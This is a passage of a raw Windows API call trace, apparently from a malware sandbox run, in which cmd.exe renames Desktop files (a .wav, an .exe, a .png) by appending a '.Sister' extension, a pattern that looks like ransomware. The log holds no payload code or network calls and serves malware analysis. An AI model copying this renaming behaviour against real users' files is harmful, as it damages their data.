(_String1="Yc0pm06NSLlWRhlBhv0.wav", _String2="..") returned 75 [0195.589] GetFileAttributesW (lpFileName="Yc0pm06NSLlWRhlBhv0.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\yc0pm06nsllwrhlbhv0.wav")) returned 0x20 [0195.589] ??_V@YAXPEAX@Z () returned 0x1 [0195.589] malloc (_Size=0xffce) returned 0x21ed96ffd80 [0195.589] ??_V@YAXPEAX@Z () returned 0x21ed96ffd80 [0195.589] malloc (_Size=0xffce) returned 0x21ed970fd60 [0195.589] ??_V@YAXPEAX@Z () returned 0x21ed970fd60 [0195.589] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Yc0pm06NSLlWRhlBhv0.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\yc0pm06nsllwrhlbhv0.wav")) returned 0x20 [0195.590] malloc (_Size=0xffce) returned 0x21ed923fd00 [0195.590] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0195.590] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Yc0pm06NSLlWRhlBhv0.wav", fInfoLevelId=0x1, lpFindFileData=0x21ed9559740, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed9559740) returned 0x21ed8d65400 [0195.590] malloc (_Size=0xffce) returned 0x21ed924fce0 [0195.590] ??_V@YAXPEAX@Z () returned 0x21ed924fce0 [0195.590] ??_V@YAXPEAX@Z () returned 0x1 [0195.590] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\Yc0pm06NSLlWRhlBhv0.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\yc0pm06nsllwrhlbhv0.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\Yc0pm06NSLlWRhlBhv0.wav.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\yc0pm06nsllwrhlbhv0.wav.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0195.627] FindNextFileW (in: hFindFile=0x21ed8d65400, lpFindFileData=0x21ed9559740 | out: lpFindFileData=0x21ed9559740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20d91df0, ftCreationTime.dwHighDateTime=0x1d5e301, ftLastAccessTime.dwLowDateTime=0xf20b5d00, ftLastAccessTime.dwHighDateTime=0x1d5e4a7, ftLastWriteTime.dwLowDateTime=0xf20b5d00, ftLastWriteTime.dwHighDateTime=0x1d5e4a7, nFileSizeHigh=0x0, nFileSizeLow=0xd0e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Yc0pm06NSLlWRhlBhv0.wav", cAlternateFileName="")) returned 0 [0195.629] GetLastError () returned 0x12 [0195.629] FindClose (in: hFindFile=0x21ed8d65400 | out: hFindFile=0x21ed8d65400) returned 1 [0195.629] ??_V@YAXPEAX@Z () returned 0x1 [0195.629] ??_V@YAXPEAX@Z () returned 0x1 [0195.629] ??_V@YAXPEAX@Z () returned 0x1 [0195.629] ??_V@YAXPEAX@Z () returned 0x1 [0195.631] GetProcessHeap () returned 0x21ed8c70000 [0195.631] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d65400 [0195.631] GetProcessHeap () returned 0x21ed8c70000 [0195.631] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95ae0, Size=0x16) returned 0x21ed8c955c0 [0195.631] GetProcessHeap () returned 0x21ed8c70000 [0195.631] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c955c0) returned 0x16 [0195.631] GetProcessHeap () returned 0x21ed8c70000 [0195.631] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0195.631] GetProcessHeap () returned 0x21ed8c70000 [0195.631] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0195.632] GetProcessHeap () returned 0x21ed8c70000 [0195.632] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d6cd20 [0195.632] GetProcessHeap () returned 0x21ed8c70000 [0195.632] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6cd20, Size=0xb2) returned 0x21ed8d6cd20 [0195.632] GetProcessHeap () returned 0x21ed8c70000 [0195.632] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6cd20) returned 0xb2 [0195.632] GetProcessHeap () returned 0x21ed8c70000 [0195.632] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9570890 [0195.632] GetProcessHeap () returned 0x21ed8c70000 [0195.632] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9570890, Size=0x30) returned 0x21ed9570890 [0195.632] GetProcessHeap () returned 0x21ed8c70000 [0195.632] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9570890) returned 0x30 [0195.632] GetProcessHeap () returned 0x21ed8c70000 [0195.632] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed95708d0 [0195.632] malloc (_Size=0x1ff9c) returned 0x21ed96ffd80 [0195.635] GetProcessHeap () returned 0x21ed8c70000 [0195.635] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937d690 [0195.635] GetProcessHeap () returned 0x21ed8c70000 [0195.635] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed937d810 [0195.635] ??_V@YAXPEAX@Z () returned 0x1 [0195.635] malloc (_Size=0x1ff9c) returned 0x21ed96ffd80 [0195.635] GetProcessHeap () returned 0x21ed8c70000 [0195.635] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937da50 [0195.635] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed96ffd80, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0195.635] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd937bf50, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d65460 [0195.635] FindClose (in: hFindFile=0x21ed8d65460 | out: hFindFile=0x21ed8d65460) returned 1 [0195.635] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd937bf50, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d65460 [0195.635] FindClose (in: hFindFile=0x21ed8d65460 | out: hFindFile=0x21ed8d65460) returned 1 [0195.636] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9f30a3d0, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x9f30a3d0, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd937bf50, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d65460 [0195.636] FindClose (in: hFindFile=0x21ed8d65460 | out: hFindFile=0x21ed8d65460) returned 1 [0195.636] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9f30a3d0, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x9f30a3d0, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd937bf50, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0195.636] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0195.636] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0195.637] GetProcessHeap () returned 0x21ed8c70000 [0195.637] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d66f30 [0195.638] ??_V@YAXPEAX@Z () returned 0x1 [0195.638] ??_V@YAXPEAX@Z () returned 0x1 [0195.638] GetProcessHeap () returned 0x21ed8c70000 [0195.638] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed95708d0, Size=0x490) returned 0x21ed95708d0 [0195.638] GetProcessHeap () returned 0x21ed8c70000 [0195.638] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed95708d0) returned 0x490 [0195.638] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0195.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.638] GetFileType (hFile=0x50) returned 0x2 [0195.638] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0195.638] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0195.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.719] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0195.813] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0195.813] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0195.813] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0195.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.813] GetFileType (hFile=0x50) returned 0x2 [0195.813] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0195.813] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0195.904] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.904] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0195.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.975] GetFileType (hFile=0x50) returned 0x2 [0195.975] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0195.975] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0196.088] _get_osfhandle (_FileHandle=1) returned 0x50 [0196.088] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed95708a0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed95708a0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0196.355] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0196.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0196.355] GetFileType (hFile=0x50) returned 0x2 [0196.355] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0196.355] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0196.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0196.441] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0196.519] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0196.519] _get_osfhandle (_FileHandle=1) returned 0x50 [0196.519] GetFileType (hFile=0x50) returned 0x2 [0196.519] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0196.519] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0196.590] _get_osfhandle (_FileHandle=1) returned 0x50 [0196.590] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0196.758] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0196.835] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0196.835] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0196.836] malloc (_Size=0xffce) returned 0x21ed96ffd80 [0196.836] ??_V@YAXPEAX@Z () returned 0x21ed96ffd80 [0196.836] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0196.836] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0196.836] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0196.836] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0196.836] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0196.836] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0196.836] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0196.839] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0196.839] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0196.839] ??_V@YAXPEAX@Z () returned 0x1 [0196.839] GetProcessHeap () returned 0x21ed8c70000 [0196.839] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d6cdf0 [0196.840] GetProcessHeap () returned 0x21ed8c70000 [0196.840] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6cdf0, Size=0x130) returned 0x21ed8d6cdf0 [0196.840] GetProcessHeap () returned 0x21ed8c70000 [0196.840] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6cdf0) returned 0x130 [0196.840] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.840] malloc (_Size=0xffce) returned 0x21ed96ffd80 [0196.840] ??_V@YAXPEAX@Z () returned 0x21ed96ffd80 [0196.840] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.840] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed96ffd80, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0196.842] ??_V@YAXPEAX@Z () returned 0x1 [0196.842] GetProcessHeap () returned 0x21ed8c70000 [0196.842] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d6b7f0 [0196.842] GetProcessHeap () returned 0x21ed8c70000 [0196.842] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d6cf30 [0196.842] GetProcessHeap () returned 0x21ed8c70000 [0196.842] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6cf30, Size=0x130) returned 0x21ed8d6cf30 [0196.842] GetProcessHeap () returned 0x21ed8c70000 [0196.842] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6cf30) returned 0x130 [0196.842] malloc (_Size=0xffce) returned 0x21ed96ffd80 [0196.842] ??_V@YAXPEAX@Z () returned 0x21ed96ffd80 [0196.842] GetProcessHeap () returned 0x21ed8c70000 [0196.842] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d65460 [0196.842] GetProcessHeap () returned 0x21ed8c70000 [0196.842] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed955c580 [0196.842] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0196.843] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0196.843] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0196.843] GetLastError () returned 0x2 [0196.843] GetProcessHeap () returned 0x21ed8c70000 [0196.843] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9a00000 [0196.843] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9a00010 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0196.843] SetErrorMode (uMode=0x0) returned 0x0 [0196.843] SetErrorMode (uMode=0x1) returned 0x0 [0196.843] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed96ffd80, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0196.843] SetErrorMode (uMode=0x0) returned 0x1 [0196.843] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0196.843] GetProcessHeap () returned 0x21ed8c70000 [0196.843] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed955b6e0 [0196.843] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0196.843] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0196.844] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0196.844] GetLastError () returned 0x2 [0196.844] ??_V@YAXPEAX@Z () returned 0x1 [0196.844] malloc (_Size=0xffce) returned 0x21ed96ffd80 [0196.844] ??_V@YAXPEAX@Z () returned 0x21ed96ffd80 [0196.844] malloc (_Size=0xffce) returned 0x21ed970fd60 [0196.844] ??_V@YAXPEAX@Z () returned 0x21ed970fd60 [0196.844] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0196.844] GetLastError () returned 0x2 [0196.844] _get_osfhandle (_FileHandle=2) returned 0x54 [0196.844] GetFileType (hFile=0x54) returned 0x2 [0196.844] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0196.844] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0196.978] _get_osfhandle (_FileHandle=2) returned 0x54 [0196.978] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0197.075] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0197.076] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0197.076] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0197.231] longjmp () [0197.231] ??_V@YAXPEAX@Z () returned 0x1 [0197.231] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x687668f0, ftCreationTime.dwHighDateTime=0x1d5ee07, ftLastAccessTime.dwLowDateTime=0x30f0edd0, ftLastAccessTime.dwHighDateTime=0x1d5eb4e, ftLastWriteTime.dwLowDateTime=0x30f0edd0, ftLastWriteTime.dwHighDateTime=0x1d5eb4e, nFileSizeHigh=0x0, nFileSizeLow=0xf9ba, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="YgF_fsDPEPZ_A1NWq.png", cAlternateFileName="")) returned 1 [0197.231] GetProcessHeap () returned 0x21ed8c70000 [0197.231] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6c840, Size=0x4ee) returned 0x21ed8d6d070 [0197.231] GetProcessHeap () returned 0x21ed8c70000 [0197.231] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6d070) returned 0x4ee [0197.231] GetProcessHeap () returned 0x21ed8c70000 [0197.231] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9570d70 [0197.232] GetProcessHeap () returned 0x21ed8c70000 [0197.232] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9570d70, Size=0x30) returned 0x21ed9570d70 [0197.232] GetProcessHeap () returned 0x21ed8c70000 [0197.232] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9570d70) returned 0x30 [0197.232] GetProcessHeap () returned 0x21ed8c70000 [0197.232] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9570db0 [0197.232] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0197.233] GetProcessHeap () returned 0x21ed8c70000 [0197.233] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3c) returned 0x21ed8d6e270 [0197.233] ??_V@YAXPEAX@Z () returned 0x1 [0197.233] GetProcessHeap () returned 0x21ed8c70000 [0197.233] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9570db0, Size=0x1d0) returned 0x21ed9570db0 [0197.233] GetProcessHeap () returned 0x21ed8c70000 [0197.233] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9570db0) returned 0x1d0 [0197.233] GetProcessHeap () returned 0x21ed8c70000 [0197.233] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9570f90 [0197.233] GetProcessHeap () returned 0x21ed8c70000 [0197.233] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9570f90, Size=0x290) returned 0x21ed9570f90 [0197.233] GetProcessHeap () returned 0x21ed8c70000 [0197.234] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9570f90) returned 0x290 [0197.234] GetProcessHeap () returned 0x21ed8c70000 [0197.234] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9a0fff0 [0197.234] GetProcessHeap () returned 0x21ed8c70000 [0197.234] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9a0fff0, Size=0x30) returned 0x21ed9a0fff0 [0197.234] GetProcessHeap () returned 0x21ed8c70000 [0197.234] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9a0fff0) returned 0x30 [0197.234] GetProcessHeap () returned 0x21ed8c70000 [0197.234] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9a10030 [0197.234] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0197.234] GetProcessHeap () returned 0x21ed8c70000 [0197.234] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3c) returned 0x21ed8d6eb30 [0197.234] ??_V@YAXPEAX@Z () returned 0x1 [0197.234] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0197.234] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed9a14a60 [0197.235] FindClose (in: hFindFile=0x21ed9a14a60 | out: hFindFile=0x21ed9a14a60) returned 1 [0197.235] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, 